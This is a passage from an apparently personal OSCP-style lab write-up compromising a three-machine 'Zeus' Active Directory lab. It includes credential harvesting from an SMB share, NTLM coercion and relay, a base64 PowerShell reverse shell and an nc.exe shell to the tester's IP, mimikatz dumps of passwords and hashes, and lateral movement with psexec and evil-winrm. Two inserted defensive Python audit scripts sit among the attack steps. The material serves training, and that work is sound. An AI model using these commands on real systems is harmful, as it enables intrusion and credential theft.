Zeus

Challenge 7 - Zeus

Network

NAME  IP
VM01  192.168.229.158
VM02  192.168.229.159
VM03  192.168.229.160

Domain

VM01

ENUMERATION

Ports
PORT       SERVICE         VERSION
53/tcp     domain          Simple DNS Plus
88/tcp     kerberos-sec    Microsoft Windows Kerberos (server time: 2024-12-01 14:30:20Z)
135/tcp    msrpc           Microsoft Windows RPC
139/tcp    netbios-ssn
389/tcp    ldap            Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
445/tcp    microsoft-ds
464/tcp    kpasswd5
593/tcp    http-rpc-epmap  Microsoft Windows RPC over HTTP 1.0
636/tcp    ldapssl         Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
1433/tcp   ms-sql-s        Microsoft SQL Server 2019 15.00.2000
3268/tcp   globalcatLDAP   Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
3269/tcp   globalcatLDAP   Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
5985/tcp   wsman           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp   adws            .NET Message Framing
49667/tcp  unknown         Microsoft Windows RPC
49669/tcp  unknown         Microsoft Windows RPC
49670/tcp  unknown         Microsoft Windows RPC
49672/tcp  unknown         Microsoft Windows RPC
49690/tcp  unknown         Microsoft Windows RPC
54379/tcp  unknown         Microsoft Windows RPC
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus/VM01]
└─$ sudo nmap -sS -p- vm01.oscp.exam | tee nmap_ss.txt                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 15:24 CET
Nmap scan report for vm01.oscp.exam (192.168.229.158)
Host is up (0.056s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49672/tcp open  unknown
49690/tcp open  unknown
54379/tcp open  unknown
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus/VM01]
└─$ sudo nmap -sV -p53,88,135,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49670,49672,49690,54379 --script="vuln" vm01.oscp.exam | tee nmap_sv.txt 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 15:29 CET
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for vm01.oscp.exam (192.168.229.158)
Host is up (0.071s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-01 14:30:20Z)
135/tcp   open  msrpc         Microsoft Windows RPC
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:microsoft:sql_server:2019: 
|       CVE-2023-36785  7.8     https://vulners.com/cve/CVE-2023-36785
|_      CVE-2022-23276  7.8     https://vulners.com/cve/CVE-2022-23276
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
54379/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 472.42 seconds

VM02

ENUMERATION

Ports
PORT      SERVICE       VERSION
135/tcp   msrpc
139/tcp   netbios-ssn
445/tcp   microsoft-ds
5040/tcp  unknown
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus/VM02]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt vm02.oscp.exam    
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 16:26 CET
Nmap scan report for vm02.oscp.exam (192.168.229.159)
Host is up (0.066s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49673/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 77.76 seconds
Enum4linux
  • sudo enum4linux -w zeus -u guest -p ''

SMB
  • Connecting to the share

    Bash
    ┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus/VM02]
    └─$ sudo smbclient -U 'zeus\guest' \\\\192.168.229.159\\SQL
    Password for [ZEUS\guest]:
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Sun Jun 26 23:00:11 2022
      ..                                  D        0  Sun Jun 26 23:00:11 2022
      connection.sql                      A      528  Sun Jun 26 22:53:00 2022
    
                    12424538 blocks of size 4096. 7116275 blocks available
    smb: \> get connection.sql
    getting file \connection.sql of size 528 as connection.sql (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)
    smb: \> 
    

  • I check the contents of connection.sql:

    Bash
    ┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus/VM02]
    └─$ cat connection.sql  
    $SqlServer    = 'DC01'
    $Database     = 'master'
    $SqlAuthLogin = 'zeus.corp\db_user'
    $SqlAuthPw    = 'Password123!'
    # query to show changes
    $Query = '
    SELECT @@SERVERNAME AS [ServerName]
        , des.login_name
        , DB_NAME()   AS [DatabaseName]
        , dec.net_packet_size
        , @@LANGUAGE  AS [Language]
        , des.program_name
        , des.host_name
    FROM sys.dm_exec_connections dec
    JOIN sys.dm_exec_sessions des ON dec.session_id = des.session_id
    WHERE dec.session_id = @@SPID
    '
    
    ### Add Additional queries here ###    
    

VM03

ENUMERATION

Ports
PORT      SERVICE       VERSION
135/tcp   msrpc         Microsoft Windows RPC
139/tcp   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   microsoft-ds
5040/tcp  unknown
7680/tcp  pando-pub
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus/VM03]
└─$ sudo nmap -Pn -sV -p- -oN alltcp_ports_sV.txt vm03.oscp.exam
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 16:23 CET
Nmap scan report for vm03.oscp.exam (192.168.229.160)
Host is up (0.073s latency).
Not shown: 65523 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 225.01 seconds
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus/VM03]
└─$ sudo nmap -Pn -sU -sV -sC --top-ports=20 -oN top_20_udp_nmap.txt $ip
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 16:57 CET
Nmap scan report for vm03.oscp.exam (192.168.229.160)
Host is up (0.059s latency).

PORT      STATE         SERVICE      VERSION
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    closed        dhcpc
69/udp    closed        tftp
123/udp   open|filtered ntp
135/udp   closed        msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   open|filtered isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp closed        unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 234.53 seconds

EXPLOITATION

I start Responder on the tun0 interface

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ sudo responder -I tun0

I trigger an SMB request from the database server towards my machine 192.168.45.176:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ sudo sqsh -S 192.168.229.158 -U 'zeus\db_user' -P 'Password123!' -D 'master'
[sudo] password for momphucker: 
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
(0 rows affected, return status = 0)
1> EXEC xp_dirtree '\\192.168.45.176\tesaweft';
2> go

And in the response

Bash
[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [192.168.45.176]
    Responder IPv6             [fe80::5b8e:8732:5dbf:e97c]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-ZH00DPWLND8]
    Responder Domain Name      [XSAT.LOCAL]
    Responder DCE-RPC Port     [45862]

[+] Listening for events...                                                                                                                                                     

[SMB] NTLMv2-SSP Client   : 192.168.229.158
[SMB] NTLMv2-SSP Username : zeus\svc_mssql$
[SMB] NTLMv2-SSP Hash     : svc_mssql$::zeus:ed1c6b5eb251466d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

The MSSQL server therefore makes the call as svc_mssql$.

At this point I open a listener with nc -nvlp 4455:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ nc -nvlp 4455     
listening on [any] 4455 ...

and run a reverse shell through impacket-ntlmrelayx:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.229.158 -c "powershell -e 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"

At this point I am logged in on VM02 as SYSTEM:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ nc -nvlp 4455     
listening on [any] 4455 ...
connect to [192.168.45.176] from (UNKNOWN) [192.168.229.159] 53671

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> 
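
The relay above only works because the target accepts unsigned SMB sessions. As an added example (not part of the original write-up), the script below parses the per-host banner line that crackmapexec/netexec print (the same format that appears later in these notes) and lists every host whose "(signing:False)" flag would let a relayed NTLM authentication through; those are the hosts a defender fixes by enforcing SMB signing. The banner format is assumed from that line; the sample output is constructed, and only the CLIENT02 line mirrors the notes.

```python
"""List SMB hosts that do not require signing, the precondition for NTLM relay.

Added example, not part of the original notes. Parses crackmapexec-style
SMB banner lines and reports hosts that accept unsigned sessions.
"""
import re
from dataclasses import dataclass

# One crackmapexec SMB banner line per host (assumed format, as shown in these notes).
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)\s+\S+\s+\[\*\]\s+"
    r"(?P<os>.*?)\s+\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)


@dataclass(frozen=True)
class SmbHost:
    ip: str
    name: str
    domain: str
    os: str
    signing_required: bool
    smbv1: bool


# Constructed sample: FILESRV01 and CLIENT01 are invented, CLIENT02 mirrors the notes.
SAMPLE_OUTPUT = """\
SMB         192.168.229.161 445    FILESRV01        [*] Windows Server 2019 Build 17763 x64 (name:FILESRV01) (domain:zeus) (signing:True) (SMBv1:False)
SMB         192.168.229.159 445    CLIENT01         [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT01) (domain:zeus) (signing:False) (SMBv1:True)
SMB         192.168.229.160 445    CLIENT02         [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT02) (domain:zeus) (signing:False) (SMBv1:False)
SMB         192.168.229.160 445    CLIENT02         [+] zeus\\o.foller (Pwn3d!)
"""


def parse_banners(text: str) -> list[SmbHost]:
    """Return one SmbHost per banner line; any other output line is ignored."""
    hosts = []
    for line in text.splitlines():
        m = BANNER_RE.match(line)
        if m is None:
            continue
        hosts.append(SmbHost(
            ip=m["ip"], name=m["name"], domain=m["domain"], os=m["os"],
            signing_required=m["signing"] == "True",
            smbv1=m["smbv1"] == "True",
        ))
    return hosts


def relayable_hosts(hosts: list[SmbHost]) -> list[SmbHost]:
    """Hosts that accept unsigned SMB: relay targets until signing is enforced."""
    return [h for h in hosts if not h.signing_required]


def report(text: str) -> str:
    """Human-readable summary of the hosts that still need SMB signing enforced."""
    hosts = parse_banners(text)
    weak = relayable_hosts(hosts)
    lines = [f"{len(hosts)} SMB hosts parsed, {len(weak)} do not require signing:"]
    for h in weak:
        extra = "  [SMBv1 still enabled]" if h.smbv1 else ""
        lines.append(f"  {h.ip:<16} {h.name:<10} {h.os}{extra}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_OUTPUT))
```

Feeding the script the real `crackmapexec smb <range>` output of a domain gives the list of hosts where the "RequireSecuritySignature" policy is not applied; on domain controllers signing is required by default, so a DC showing up here is a misconfiguration worth escalating.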

The shell turns out to be very unstable, so I open a new reverse shell (after uploading nc.exe) as SYSTEM. I open a new listener:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ nc -nvlp 4444 
Bash
PS C:\windows\temp\wintools> .\nc.exe 192.168.45.176 4444 -e powershell

I retrieve the flag:

Bash
PS C:\users\administrator\desktop> type proof.txt
type proof.txt
f1ff860ac615273bd52d2ba0d4043ccd
PS C:\users\administrator\desktop> whoami
whoami
nt authority\system
PS C:\users\administrator\desktop> ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.229.159
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.229.254
PS C:\users\administrator\desktop> 

Now, after uploading it, I run mimikatz.exe

Bash
PS C:\windows\temp\wintools> .\mimikatz.exe
.\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

And among the various results I find credentials:

Bash
Authentication Id : 0 ; 261676 (00000000:0003fe2c)
Session           : Service from 0
User Name         : o.foller
Domain            : zeus
Logon Server      : DC01
Logon Time        : 11/26/2024 9:16:51 PM
SID               : S-1-5-21-2826791697-1341466529-4139912853-10601
        msv :
         [00000003] Primary
         * Username : o.foller
         * Domain   : zeus
         * NTLM     : decca5b9babc228de4cedeb29a6b9abf
         * SHA1     : d570701c87b24e555619ccd3a9aadeb12c126629
         * DPAPI    : f675788d44c8293071ee2cabde5fb136
        tspkg :
        wdigest :
         * Username : o.foller
         * Domain   : zeus
         * Password : (null)
        kerberos :
         * Username : o.foller
         * Domain   : ZEUS.CORP
         * Password : EarlyMorningFootball777
        ssp :
        credman :
        cloudap :

I run crackmapexec against the machine 192.168.229.160:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ sudo crackmapexec smb 192.168.229.160 -d 'zeus' -u o.foller -p 'EarlyMorningFootball777' -x whoami
[sudo] password for momphucker: 
SMB         192.168.229.160 445    CLIENT02         [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT02) (domain:zeus) (signing:False) (SMBv1:False)
SMB         192.168.229.160 445    CLIENT02         [+] zeus\o.foller:EarlyMorningFootball777 (Pwn3d!)
SMB         192.168.229.160 445    CLIENT02         [+] Executed command 
SMB         192.168.229.160 445    CLIENT02         zeus\o.foller

Now I open a shell over SMB using impacket-psexec:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ sudo impacket-psexec 'zeus/o.foller':'EarlyMorningFootball777'@192.168.229.160
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 192.168.229.160.....
[*] Found writable share ADMIN$
[*] Uploading file thhSYeWP.exe
[*] Opening SVCManager on 192.168.229.160.....
[*] Creating service Hrup on 192.168.229.160.....
[*] Starting service Hrup.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19042.631]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
Bash
c:\Users\Administrator\Desktop> type proof.txt
22d0f0efc53590883fde4ce5f42638f4

c:\Users\Administrator\Desktop> whoami
nt authority\system

c:\Users\Administrator\Desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.229.160
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.229.254

The machine holds the file c:\Users\z.thomas\Downloads\Onboarding Document.docx, which contains the following credentials:
  • username: z.thomas
  • password: ^1+>pdRLwyct]j,CYmyi

With these credentials I connect to the DC via evil-winrm:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE]
└─$ sudo evil-winrm -i 192.168.229.158 -u z.thomas     
[sudo] password for momphucker: 
Enter Password: 

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\z.thomas\Documents>

At this point I open an interactive reverse shell to the listener on port 4466:

Bash
*Evil-WinRM* PS C:\Users\z.thomas\Documents> powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADEANwA2ACIALAA0ADQANgA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE]
└─$ nc -nvlp 4466     
listening on [any] 4466 ...
connect to [192.168.45.176] from (UNKNOWN) [192.168.229.158] 54552

PS C:\Users\z.thomas\Documents> whoami
zeus\z.thomas
PS C:\Users\z.thomas\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS C:\Users\z.thomas\Documents> 

I retrieve the local flag:

Bash
PS C:\Users\z.thomas\desktop> type local.txt
fa0ba8106cbab68d4a11e61fbad09ab9
PS C:\Users\z.thomas\desktop> whoami
zeus\z.thomas
PS C:\Users\z.thomas\desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::c758:61d8:60d:1552%12
   IPv4 Address. . . . . . . . . . . : 192.168.229.158
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.229.254

The user z.thomas can change users' passwords, so I change the one for d.chambers:

Bash
PS C:\Users\z.thomas\desktop\wintools> Get-ObjectAcl -Identity "d.chambers" -ResolveGUIDs
Bash
AceQualifier           : AccessAllowed
ObjectDN               : CN=Donna Chambers,CN=Users,DC=zeus,DC=corp
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : User-Change-Password
ObjectSID              : S-1-5-21-2826791697-1341466529-4139912853-1107
InheritanceFlags       : None
BinaryLength           : 40
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-1-0
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : None
InheritedObjectAceType : All
OpaqueLength           : 0
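
The ACE above grants a password-change extended right to SecurityIdentifier S-1-1-0, which is the well-known SID for Everyone. As an added example (not part of the original notes), the script below reads the key/value blocks that Get-ObjectAcl -ResolveGUIDs prints and reports every allow-ACE whose extended right is User-Change-Password or User-Force-Change-Password when the trustee is a broad well-known principal (Everyone, Authenticated Users, Anonymous Logon, BUILTIN\Users). The first block in the sample is the d.chambers ACE from the notes; the second (Principal Self, S-1-5-10, the normal holder of User-Change-Password) and the third (a constructed "Example Svc" object) are constructed.

```python
"""Audit PowerView-style ACE dumps for password-change rights held by broad principals.

Added example, not part of the original notes. Parses the block output of
Get-ObjectAcl -ResolveGUIDs and flags password rights granted to "anyone" SIDs.
"""

# Well-known SIDs that stand for "anyone": a password right held by these is worth review.
BROAD_PRINCIPALS = {
    "S-1-1-0": "Everyone",
    "S-1-5-7": "Anonymous Logon",
    "S-1-5-11": "Authenticated Users",
    "S-1-5-32-545": "BUILTIN\\Users",
}

# Severity: changing with the old password is bad enough; resetting without it is worse.
PASSWORD_RIGHTS = {
    "User-Change-Password": "medium",
    "User-Force-Change-Password": "high",
}

# First block: the ACE from the notes. Second: constructed SELF entry (S-1-5-10).
# Third: constructed object "Example Svc" with a force-change right for Authenticated Users.
SAMPLE_ACL_OUTPUT = """\
AceQualifier           : AccessAllowed
ObjectDN               : CN=Donna Chambers,CN=Users,DC=zeus,DC=corp
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : User-Change-Password
ObjectSID              : S-1-5-21-2826791697-1341466529-4139912853-1107
InheritanceFlags       : None
BinaryLength           : 40
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-1-0
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : None
InheritedObjectAceType : All
OpaqueLength           : 0

AceQualifier           : AccessAllowed
ObjectDN               : CN=Donna Chambers,CN=Users,DC=zeus,DC=corp
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : User-Change-Password
ObjectSID              : S-1-5-21-2826791697-1341466529-4139912853-1107
SecurityIdentifier     : S-1-5-10
AccessMask             : 256
AceType                : AccessAllowedObject

AceQualifier           : AccessAllowed
ObjectDN               : CN=Example Svc,CN=Users,DC=zeus,DC=corp
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : User-Force-Change-Password
ObjectSID              : S-1-5-21-2826791697-1341466529-4139912853-9999
SecurityIdentifier     : S-1-5-11
AccessMask             : 256
AceType                : AccessAllowedObject
"""


def parse_aces(text: str) -> list[dict]:
    """Split the dump into blank-line-separated blocks; each block becomes one ACE dict."""
    aces, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                aces.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")   # split on the first colon only (DNs contain none)
        if sep:
            current[key.strip()] = value.strip()
    if current:
        aces.append(current)
    return aces


def find_risky_aces(aces: list[dict]) -> list[dict]:
    """Allow-ACEs granting a password-change right to a broad well-known principal."""
    findings = []
    for ace in aces:
        if ace.get("AceQualifier") != "AccessAllowed":
            continue
        right = ace.get("ObjectAceType")
        sid = ace.get("SecurityIdentifier", "")
        if right not in PASSWORD_RIGHTS or sid not in BROAD_PRINCIPALS:
            continue
        findings.append({
            "target": ace.get("ObjectDN", "?"),
            "right": right,
            "principal": BROAD_PRINCIPALS[sid],
            "sid": sid,
            "severity": PASSWORD_RIGHTS[right],
        })
    return findings


if __name__ == "__main__":
    for f in find_risky_aces(parse_aces(SAMPLE_ACL_OUTPUT)):
        print(f"[{f['severity']}] {f['principal']} ({f['sid']}) has {f['right']} on {f['target']}")
```

Piping the output of `Get-ObjectAcl -ResolveGUIDs` for the whole Users container into this parser gives a quick list of objects where a password right has drifted to a broad group; the fix is to remove the ACE or narrow the trustee.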

I reopen a reverse shell with the freshly reset credentials:
  • username: d.chambers
  • password: Aa.123456!

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE]
└─$ nc -nvlp 4466
listening on [any] 4466 ...
connect to [192.168.45.176] from (UNKNOWN) [192.168.229.158] 54849

PS C:\Users\d.chambers\Documents> whoami
zeus\d.chambers
PS C:\Users\d.chambers\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
